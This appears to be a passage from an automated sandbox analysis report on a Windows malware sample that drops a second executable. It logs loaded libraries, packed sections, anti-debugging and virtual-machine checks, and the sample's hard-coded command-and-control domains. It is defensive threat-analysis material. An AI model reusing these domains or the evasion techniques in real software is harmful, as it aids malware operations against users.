    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: pcacli.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeSection loaded: msvcr100.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeSection loaded: webio.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
    Source: Binary string: .pDB~B source: L7GNkeVm5e.exe

    Data Obfuscation

    barindex
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeUnpacked PE file: 0.2.L7GNkeVm5e.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.vakolu:W;.devuwi:W;.pogezal:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeUnpacked PE file: 2.2.EB86.tmp.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.nosu:W;.muwav:W;.roxah:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeUnpacked PE file: 0.2.L7GNkeVm5e.exe.400000.0.unpack
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeUnpacked PE file: 2.2.EB86.tmp.exe.400000.0.unpack
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_0041EC4E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC4E
    Source: L7GNkeVm5e.exeStatic PE information: section name: .vakolu
    Source: L7GNkeVm5e.exeStatic PE information: section name: .devuwi
    Source: L7GNkeVm5e.exeStatic PE information: section name: .pogezal
    Source: ScreenUpdateSync[1].exe.0.drStatic PE information: section name: .nosu
    Source: ScreenUpdateSync[1].exe.0.drStatic PE information: section name: .muwav
    Source: ScreenUpdateSync[1].exe.0.drStatic PE information: section name: .roxah
    Source: EB86.tmp.exe.0.drStatic PE information: section name: .nosu
    Source: EB86.tmp.exe.0.drStatic PE information: section name: .muwav
    Source: EB86.tmp.exe.0.drStatic PE information: section name: .roxah
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_00410756 push ecx; ret 0_2_00410769
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_0040FD82 push ecx; ret 0_2_0040FD95
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_0062F1D0 pushad ; ret 0_2_0062F1EC
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_0062F34D push ecx; ret 0_2_0062F36A
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_0062CBC1 push 00000003h; ret 0_2_0062CBC5
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_0062AE04 push es; iretd 0_2_0062AE15
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_0062BED4 push ds; ret 0_2_0062BEDD
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_0213798F push esp; retf 0_2_02137997
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_021109BD push ecx; ret 0_2_021109D0
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_0211CE08 push es; retf 0_2_0211CE0D
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_02137F8D push esp; retf 0_2_02137F8E
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_0210FFE9 push ecx; ret 0_2_0210FFFC
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_02139DD8 pushad ; retf 0_2_02139DDF
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_0213DDCE push dword ptr [esp+ecx-75h]; iretd 0_2_0213DDD2
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_00441850 push eax; mov dword ptr [esp], 0E0908DBh2_2_00441853
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0060817D pushfd ; ret 2_2_0060817E
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0060613E push ebx; ret 2_2_0060613F
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_00608112 pushad ; ret 2_2_00608113
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_00606CE6 push esi; retn 001Ch2_2_00606CEA
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0218B05A push ebp; iretd 2_2_0218B05D
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_021A1AB7 push eax; mov dword ptr [esp], 0E0908DBh2_2_021A1ABA
    Source: L7GNkeVm5e.exeStatic PE information: section name: .text entropy: 7.541693666484268
    Source: ScreenUpdateSync[1].exe.0.drStatic PE information: section name: .text entropy: 7.417548317236182
    Source: EB86.tmp.exe.0.drStatic PE information: section name: .text entropy: 7.417548317236182
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exeJump to dropped file
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeFile created: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeJump to dropped file
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_0040E96A GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0040E96A
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeWindow / User API: threadDelayed 3919Jump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeWindow / User API: threadDelayed 6069Jump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-65060
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeAPI coverage: 5.1 %
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeAPI coverage: 10.0 %
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe TID: 5536Thread sleep count: 3919 > 30Jump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe TID: 5536Thread sleep time: -2829518s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe TID: 5536Thread sleep count: 6069 > 30Jump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exe TID: 5536Thread sleep time: -4381818s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe TID: 5968Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe TID: 6196Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeLast function: Thread delayed
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeLast function: Thread delayed
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_004389E2 FindFirstFileExW,0_2_004389E2
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_02138C49 FindFirstFileExW,0_2_02138C49
    Source: EB86.tmp.exe, 00000002.00000003.2167928507.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW~~
    Source: Amcache.hve.5.drBinary or memory string: VMware
    Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
    Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
    Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
    Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: L7GNkeVm5e.exe, 00000000.00000003.4407193910.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, L7GNkeVm5e.exe, 00000000.00000002.4539795485.0000000000666000.00000004.00000020.00020000.00000000.sdmp, L7GNkeVm5e.exe, 00000000.00000002.4539850806.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167928507.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2358880463.000000000064B000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168246436.0000000000648000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168282667.000000000064A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.5.drBinary or memory string: vmci.sys
    Source: Amcache.hve.5.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
    Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
    Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
    Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.5.drBinary or memory string: VMware20,1
    Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
    Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_004402C0 LdrInitializeThunk,2_2_004402C0
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_0042A3C3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3C3
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_0041EC4E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC4E
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_0042FE4F mov eax, dword ptr fs:[00000030h]0_2_0042FE4F
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_00629893 push dword ptr fs:[00000030h]0_2_00629893
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_021300B6 mov eax, dword ptr fs:[00000030h]0_2_021300B6
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_0210092B mov eax, dword ptr fs:[00000030h]0_2_0210092B
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_02100D90 mov eax, dword ptr fs:[00000030h]0_2_02100D90
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0060306B push dword ptr fs:[00000030h]2_2_0060306B
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0216092B mov eax, dword ptr fs:[00000030h]2_2_0216092B
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_02160D90 mov eax, dword ptr fs:[00000030h]2_2_02160D90
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_0043BBB1 GetProcessHeap,0_2_0043BBB1
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_0042A3C3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3C3
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_004104C3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004104C3
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_00410656 SetUnhandledExceptionFilter,0_2_00410656
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_0040F907 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040F907
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_0212A62A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0212A62A
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_0211072A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0211072A
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_0210FB6E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0210FB6E
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_021108BD SetUnhandledExceptionFilter,0_2_021108BD

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: EB86.tmp.exeString found in binary or memory: robinsharez.shop
    Source: EB86.tmp.exeString found in binary or memory: handscreamny.shop
    Source: EB86.tmp.exeString found in binary or memory: chipdonkeruz.shop
    Source: EB86.tmp.exeString found in binary or memory: versersleep.shop
    Source: EB86.tmp.exeString found in binary or memory: crowdwarek.shop
    Source: EB86.tmp.exeString found in binary or memory: apporholis.shop
    Source: EB86.tmp.exeString found in binary or memory: femalsabler.shop
    Source: EB86.tmp.exeString found in binary or memory: soundtappysk.shop
    Source: EB86.tmp.exeString found in binary or memory: skidjazzyric.click
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeProcess created: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe "C:\Users\user\AppData\Local\Temp\EB86.tmp.exe" Jump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_0041076B cpuid 0_2_0041076B
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: GetLocaleInfoW,0_2_004351B0
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: EnumSystemLocalesW,0_2_0043B272
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: EnumSystemLocalesW,0_2_0043B2BD
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: EnumSystemLocalesW,0_2_0043B358
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B3E5
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: GetLocaleInfoW,0_2_0043B635
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0043B75E
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: GetLocaleInfoW,0_2_0043B865
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B932
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: EnumSystemLocalesW,0_2_00434DBD
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0043AFFA
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0213B261
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: EnumSystemLocalesW,0_2_02135024
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: GetLocaleInfoW,0_2_02135417
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: EnumSystemLocalesW,0_2_0213B4D9
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: EnumSystemLocalesW,0_2_0213B524
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: EnumSystemLocalesW,0_2_0213B5BF
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: GetLocaleInfoW,0_2_0213BACC
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0213BB99
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: GetLocaleInfoW,0_2_0213B892
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: GetLocaleInfoW,0_2_0213B89C
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0213B9C5
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_004103BD GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_004103BD
